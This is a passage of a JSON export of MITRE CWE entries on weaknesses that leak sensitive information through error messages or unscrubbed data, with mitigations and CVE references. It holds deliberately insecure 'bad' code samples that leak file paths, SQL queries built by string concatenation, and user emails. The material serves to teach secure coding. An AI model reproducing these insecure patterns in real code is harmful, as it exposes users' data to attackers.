files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"System Configuration","Description":"Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function."},{"Phase":"System Configuration","Description":"Create default error pages or messages that do not leak any information."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, sensitive information might be printed depending on the exception that occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"/.../","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem."},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e-&gt;getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"Intro_Text":"The following code generates an error message that leaks the full pathname of the configuration file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ConfigDir = \\"/home/myprog/config\\";$uname = GetUserInput(\\"username\\");ExitError(\\"Bad hacker!\\") if ($uname !~ /^\\\\w+$/);$file = \\"$ConfigDir/$uname.txt\\";if (! (-e $file)) {}...","xhtml:br":["","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":{"#text":"ExitError(\\"Error: $file does not exist\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-1579","Description":"Existence of user names can be determined by requesting a nonexistent blog and reading the error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1579"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2008-3060","Description":"Malformed input to login page causes leak of full path when IMAP call fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3060"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through error messages"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"215"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"54"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-174"}},{"attr":{"@_External_Reference_ID":"REF-175","@_Section":"Section 9.2, Page 326"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 16, &#34;General Good Practices.&#34; Page 415"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}},{"attr":{"@_External_Reference_ID":"REF-179"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Overly Verbose Error Messages&#34;, Page 75"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Error Message Information Leaks","attr":{"@_Date":"2009-01-12"}},{"#text":"Error Message Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an Error Message","attr":{"@_Date":"2020-02-24"}}]}},"210":{"attr":{"@_ID":"210","@_Name":"Self-generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software identifies an error condition and creates its own diagnostic or error messages that contain sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses custom configuration files for each user in the application. It checks to see if the file exists on the system before attempting to open and use the file. If the configuration file does not exist, then an error is generated, and the application exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$uname = GetUserInput(\\"username\\");if ($uname !~ /^\\\\w+$/){}$filename = \\"/home/myprog/config/\\" . $uname . \\".txt\\";if (!(-e $filename)){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":[{"#text":"ExitError(\\"Bad hacker!\\") ;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Error: $filename does not exist\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that is not associated with a configuration file, an attacker could get this pathname from the error message. It could then be used to exploit path traversal, symbolic link following, or other problems that may exist elsewhere in the application."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1745","Description":"Infoleak of sensitive information in error message (physical access required).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1745"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-Generated Error Message Infoleak"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Overly Verbose Error Messages&#34;, Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Product-Generated Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Generated Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Self-generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"211":{"attr":{"@_ID":"211","@_Name":"Externally-Generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the application, such as an error generated by the programming language interpreter that the software uses. The error can contain sensitive system information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"PHP applications are often targeted for having this issue when the PHP interpreter generates the error outside of the application\'s control. However, other languages/environments exhibit the same issue."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Configure the application\'s environment in a way that prevents errors from being generated. For example, in PHP, disable display_errors."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user. Create default error pages if necessary."},{"Phase":"Implementation","Description":"The best way to prevent this weakness during implementation is to avoid any bugs that could trigger the external error message. This typically happens when the program encounters fatal errors, such as a divide-by-zero. You will not always be able to control the use of error pages, and you might not be using a language that handles exceptions."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1581","Description":"chain: product does not protect against direct request of an include file, leading to resultant path disclosure when the include file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1581"},{"Reference":"CVE-2004-1579","Description":"Single \\"\'\\" inserted into SQL query leads to invalid SQL query execution, triggering full path disclosure. Possibly resultant from more general SQL injection issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1579"},{"Reference":"CVE-2005-0459","Description":"chain: product does not protect against direct request of a library file, leading to resultant path disclosure when the file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0459"},{"Reference":"CVE-2005-0443","Description":"invalid parameter triggers a failure to find an include file, leading to infoleak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0443"},{"Reference":"CVE-2005-0433","Description":"Various invalid requests lead to information leak in verbose error messages describing the failure to instantiate a class, open a configuration file, or execute an undefined function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0433"},{"Reference":"CVE-2004-1101","Description":"Improper handling of filename request with trailing \\"/\\" causes multiple consequences, including information leak in Visual Basic error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1101"}]},"Functional_Areas":{"Functional_Area":"Error Handling"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-External Error Message Infoleak"}},"Notes":{"Note":{"#text":"This is inherently a resultant vulnerability from a weakness within the product or an interaction error.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Functional_Areas, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Product-External Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through External Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Externally-Generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"212":{"attr":{"@_ID":"212","@_Name":"Improper Removal of Sensitive Information Before Storage or Transfer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.","Extended_Description":{"xhtml:p":["Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing.","For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"Phase":"Implementation","Description":"Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code either generates a public HTML user information page or a JSON response containing the same user information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$json = $_GET[\'json\']$username = $_GET[\'user\']if(!$json){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"// API flag, output JSON if set","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$record = getUserRecord($username);foreach($record as $fieldName =&gt; $fieldValue){}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if($fieldName == \\"email_address\\") {}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"continue;","xhtml:br":["",""],"xhtml:i":"// skip displaying user emails"}},{"#text":"writeToHtmlPage($fieldName,$fieldValue);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"#text":"$record = getUserRecord($username);echo json_encode($record);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},"Body_Text":"The programmer is careful to not display the user\'s e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user\'s e-mail address."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0406","Description":"Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0406"},{"Reference":"CVE-2002-0704","Description":"NAT feature in firewall leaks internal IP addresses in ICMP error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0704"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Boundary Cleansing Infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"Notes":{"Note":[{"#text":"This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked.","attr":{"@_Type":"Relationship"}},{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"The terms \\"cleansing\\" and \\"scrubbing\\" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the 